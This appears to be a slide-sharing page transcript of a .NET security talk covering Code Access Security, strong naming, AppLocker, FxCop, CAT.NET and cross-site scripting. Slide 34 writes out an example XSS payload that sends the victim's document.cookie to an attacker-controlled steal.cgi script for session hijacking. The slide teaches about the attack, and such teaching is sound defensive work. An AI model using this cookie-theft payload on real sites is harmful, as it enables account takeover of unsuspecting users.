Presentation is loading. Please wait.

Presentation is loading. Please wait.

.NET Code security including 4.0 & Tools Jon C. Arce

Published byMagdalene Williamson Modified over 8 years ago

Similar presentations

Presentation on theme: ".NET Code security including 4.0 & Tools Jon C. Arce"— Presentation transcript:

1 .NET Code security including 4.0 & Tools Jon C. Arce Jonarce@microsoft.com

2 Agenda Available Tools.NET Code Access Security FxCopCAT.NET.NET Framework Security Features Code Access Security Role-Based Security Cryptography Securing ASP.NET Web Applications Securing ASP.NET Web Services

3 .NET Code Access Security (CAS) Policy Code Access Security (CAS) is the.NET Common Language Runtime (CLR) mechanism for maintaining security based on the identity of code. You need to sign the code, to add EXTERNAL configuration security to the application.

4 Strong-Named Assemblies Strong names are Unique identifiers (containing a public key) Used to digitally sign assemblies Strong-named assemblies Prevent tampering Confirm the identity of the assembly’s publisher Allow side-by-side components sn –k MyFullKey.snk

5 Evidence-Based Security Evidence Is assessed when an assembly is loaded Is used to determine the permissions for the assembly Can include the assembly’s: Strong name information URLZone Authenticode signature

6 Security Policies (up to.NET 2.0) Security EntityDescription Policy Is set by administrators Is enforced at runtime Simplifies administration Contains permissions Contains code groups Code Group Associates similar components Is evidence based Is linked to permission set(s) Permission Set Is a set of granted permissions

7 Permission Sets

8 Types of Security Checks Imperative security checks Create Permission objects Call Permission methods Declarative security checks Use Permission attributes Apply to methods or classes Overriding security checks Use the Assert method Prevent the stack walk

9 Security Check Stack Walks Call Stack Security System YourAssembly SomeAssembly.NET Framework Assembly Call to ReadFile Grant: Execute 1. An assembly requests access to a method in your assembly 2. Your assembly passes the request to a.NET Framework assembly 3. The security system ensures that all callers in the stack have the required permissions 4. The security system grants access or throws an exception Grant: ReadFile Permission Demand Security exception Access denied Grant access?

10 Permission Requests Used by developers to state required permissions Implemented by attributes Prevents an assembly from loading when minimum permissions are not available //I will only run if I can call unmanaged code [assembly:SecurityPermission (SecurityAction.RequestMinimum, UnmanagedCode=true)]

11 Create a code group Control Panel Control Panel

12 Specify Membership Condition Specify Membership Condition Specify Membership Condition

13 Select a permission set

14 Naming the permission set

15 Assign permission sets

16 Setting File I/O permissions

17 Completing Code Group Creation

18 Security Policy in the v4 CLR In previous releases of the.NET Framework, CAS policy applied to all assemblies loaded into an application the major areas that are seeing updates with the v4 CLR are: the major areas that are seeing updates with the v4 CLR are: Security policy Security policy Security transparency APTCA (AllowPartiallyTrustedCallersAttribute) Evidence AppDomain Managers http://blogs.msdn.com/shawnfa/archive/2009/05/20/net-4-0- security.aspx

19 Sandboxing Privileged Code Partial Trust Web Application Wrapper Assembly Secured Resource Sandboxed Code <trust level_”Medium” originUri_--/> Permissions Demanded then Asserted AllowPartiallyTrustedCallers attribute added Assembly installed into the global assembly cache Resource Access

20 Evidence Types EvidenceDescription Application directoryThe application's installation directory. HashCryptographic hash as SHA1. PublisherSoftware publisher signature; that is, the Authenticode signer of the code. SiteSite of origin, such as http://www.microsoft.com. Strong nameCryptographically strong name of the assembly. URLURL of origin. Zoneorigin such as Internet Zone.

21 AppDomain Managers In.NET, the basic unit of execution is NOT the process, rather it is that of the Application Domain. With AppDomains, multiple applications can run in the same process, thereby sharing the.NET runtime libraries. HostSecurityManager class apply policy and permissions. This technique determines the security for the entire AppDomain at once.

22 Software Restriction Policy You can use software restriction policies to identify software and to control its ability to run on your local computer, organizational unit, domain, or site. Control the ability of software to run on your system. Permit users to run only specific files on multiuser computers. Control whether software restriction policies affect all users or just certain users on a computer. Cancel an application to run (virus)

23 New Software Restriction Policies

24 1. Sign the application

25 2. Set the publisher Publish -> Options Publish -> Options

26 Windows Application Locker AppLocker is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization based on unique identities of files. If you use AppLocker, you can create rules to allow or deny applications from running like: executable files (.exe and.com), scripts (.js,.ps1,.vbs,.cmd, and.bat), Windows Installer files (.msi and.msp), and DLL files (.dll and.ocx)

27 Isolated Storage Provides a virtual file system Allows quotas Implements file system isolation based on: Application identity User identity IsolatedStorageFile isoStore = IsolatedStorageFile.GetUserStoreForAssembly();

28 TOOLS TO HELP WITH SECURITY

29 FXCop FxCop is a code analysis tool that checks.NET managed code assemblies for conformance to the Microsoft.NET Framework Design Guidelines. It inspect assemblies for more than 200 defects in the following areas: FxCop is a code analysis tool that checks.NET managed code assemblies for conformance to the Microsoft.NET Framework Design Guidelines. It inspect assemblies for more than 200 defects in the following areas: FxCop Library design Library design Globalization Globalization Naming conventions Naming conventions Performance Performance Interoperability and portability Interoperability and portability Security Security Usage Usage

30 FxCop demo

31 Microsoft Code Analysis Tool.NET CAT.NETCAT.NET is a static code analysis tool like fxCop but specially built for managed code and with a strong focus on security vulnerabilities. CAT.NET CAT.NET scans manage code for specific security vulnerabilities like: SQL injection SQL injection LDAP injection Cross Site Scripting XPATH injection and many other categories of vulnarabilities.

32 CAT.NET demo

33 Cross Site Scripting XSS stands for Cross Site Scripting, an XSS attack is when an attacker manages to inject Java script code or sometimes other code (usually Java Script) into a website causing it to execute the code. if an attacker made a specially crafted link and sent it to an unsuspecting victim and that victim clicked the link and a piece of Java Script code could be executed which would send the victims cookie away to a CGI Script Cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities as of 2007

34 XSS Attack ! Send the victim and email, with the following HTML: document.location.replace('http://fr eewebhost.com/ph33r/steal.cgi?'+document.cookie); ">Check this Article Out! document.location.replace('http://fr eewebhost.com/ph33r/steal.cgi?'+document.cookie); ">Check this Article Out! The user would of course click the link and they would be lead to the CNN News Article, but at the same time the attacker would of been able to also direct the user towards his specially crafted URL, he now has the users cookie. Using the Firefox cookie editor the attacker copies and pastes the victims cookie and uses it for himself.

35 Microsoft Anti-Cross Site Scripting Library V3.0 The Microsoft Anti-Cross Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique -- sometimes referred to as the principle of inclusions -- to provide protection against XSS attacks. http://www.microsoft.com/downloads/details.aspx?familyid=05 1EE83C-5CCF-48ED-8463-02F56A6BFC09&displaylang=en

36 Session Summary.NET Framework Security Features Code Access Security Role-Based Security Cryptography Securing ASP.NET Web Applications Securing ASP.NET Web Services

37 Next Steps 1. Stay informed about security  Sign up for security bulletins: http://www.microsoft.com/security/security_bulletins/alerts2.asp  Get the latest Microsoft security guidance: http://www.microsoft.com/security/guidance/ 2. Get additional security training  Find online and in-person training seminars: http://www.microsoft.com/seminar/events/security.mspx  Find a local CTEC for hands-on training: http://www.microsoft.com/learning/

38 For More Information Microsoft Security Site (all audiences) http://www.microsoft.com/security MSDN Security Site (developers) http://msdn.microsoft.com/security TechNet Security Site (IT professionals) http://www.microsoft.com/technet/security

39 Questions and Answers

40

Download ppt ".NET Code security including 4.0 & Tools Jon C. Arce"

Similar presentations

© 2003 School of Computing, University of Leeds SY32 Secure Computing, Lecture 17 Secure Coding in Java and.NET Part 2: Code Access Control.

© 2003 School of Computing, University of Leeds SY32 Secure Computing, Lecture 17 Secure Coding in Java and.NET Part 2: Code Access Control.
.NET Framework Application Security Overview

.NET Framework Application Security Overview
Mobile Code Security Aviel D. Rubin, Daniel E. Geer, Jr. MOBILE CODE SECURITY, IEEE Internet Computing, 1998 Minkyu Lee 2007. 04. 23.

Mobile Code Security Aviel D. Rubin, Daniel E. Geer, Jr. MOBILE CODE SECURITY, IEEE Internet Computing, 1998 Minkyu Lee
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
DESIGNING A PUBLIC KEY INFRASTRUCTURE

DESIGNING A PUBLIC KEY INFRASTRUCTURE
Chapter 9 Chapter 9: Managing Groups, Folders, Files, and Object Security.

Chapter 9 Chapter 9: Managing Groups, Folders, Files, and Object Security.
1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.

1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.
Security in.NET Jørgen Thyme Microsoft Denmark. Topics & non-topics  Cryptography  App domains  Impersonation / delegation  Authentication  Authorization.

Security in.NET Jørgen Thyme Microsoft Denmark. Topics & non-topics  Cryptography  App domains  Impersonation / delegation  Authentication  Authorization.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 1: Introduction to Windows Server 2003.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 1: Introduction to Windows Server 2003.
Code Access Security vs. Role-Based Security  RBS  Security identity attached to user accounts  Access to resources specified according to user’s group.

Code Access Security vs. Role-Based Security  RBS  Security identity attached to user accounts  Access to resources specified according to user’s group.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 9: Implementing and Using Group Policy.

70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 9: Implementing and Using Group Policy.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
ASP.Net Security: Fundamentals Chapters 1-4 Freeman and Jones Book.

ASP.Net Security: Fundamentals Chapters 1-4 Freeman and Jones Book.
Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.

Jonas Thomsen, Ph.d. student Computer Science University of Aarhus Best Practices and Techniques for Building Secure Microsoft.
Guide to MCSE 70-290, Enhanced 1 Activity 9-1: Creating a Group Policy Object Using the MMC Objective: To create a GPO using the Group Policy Object Editor.

Guide to MCSE , Enhanced 1 Activity 9-1: Creating a Group Policy Object Using the MMC Objective: To create a GPO using the Group Policy Object Editor.
Understanding Security Lesson 6. Objective Domain Matrix Skills/ConceptsMTA Exam Objectives Understanding the System.Security Namespace Understand the.

Understanding Security Lesson 6. Objective Domain Matrix Skills/ConceptsMTA Exam Objectives Understanding the System.Security Namespace Understand the.
Page 1 Sandboxing & Signed Software Paul Krzyzanowski Distributed Systems Except as otherwise noted, the content of this presentation.

Page 1 Sandboxing & Signed Software Paul Krzyzanowski Distributed Systems Except as otherwise noted, the content of this presentation.
Module 15 Configuring and Deploying Windows Client Applications.

Module 15 Configuring and Deploying Windows Client Applications.

Similar presentations

Ads by Google